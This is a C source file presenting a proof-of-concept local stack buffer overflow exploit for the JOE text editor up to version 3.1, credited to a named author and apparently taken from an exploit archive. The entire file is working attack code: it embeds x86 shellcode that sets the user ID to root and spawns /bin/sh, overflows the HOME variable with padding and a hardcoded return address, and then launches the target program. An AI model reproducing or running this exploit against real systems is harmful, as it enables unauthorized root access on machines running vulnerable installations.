/* joe_bof.c
 *
 * JOE <= 3.1 local buffer overflow exploit (Proof of Concept)
 *
 * Tested in Slackware Linux 10.0
 *
 * by CoKi <coki@nosystem.com.ar>
 * No System Group - http://www.nosystem.com.ar
 */

#include <stdio.h>
#include <strings.h>

#define BUFFER 1056

char shellcode[]=
	"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
	"\xeb\x17\x5e\x89\x76\x08\x31\xc0"
	"\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	"\x89\xf3\x8d\x4e\x08\x31\xd2\xcd"
	"\x80\xe8\xe4\xff\xff\xff\x2f\x62"
	"\x69\x6e\x2f\x73\x68\x58";

void use(char *program);

int main(int argc, char *argv[]) {

	FILE *file;
	char buf[BUFFER], *path, tmp[BUFFER];
	char *buffer=buf;
	int ret;

	if(argc != 2) use(argv[0]);
	
	path = argv[1];

	if((file = fopen(path, "r")) == NULL) {
		printf(" Failed to open file!\n");
		exit(1);
	}

	ret = 0xbffffffa - strlen(shellcode) - strlen(path);
	
	bzero(buf, sizeof(buf));
	memset(buffer, 'A', BUFFER-4);

	sprintf(tmp, "%s", &ret);
	strncat(buf, tmp, 4);

	printf("\n joe <= 3.1 local stack buffer overflow (Proof of Concept)\n");
	printf(" by CoKi <coki@nosystem.com.ar>\n\n");

	setenv("HOME", buf, 1);
	setenv("SHELLCODE", shellcode, 1);

	execl(path, path, NULL);

}

void use(char *program) {
	printf(" Use: %s <path>\n", program);
	exit(1);
}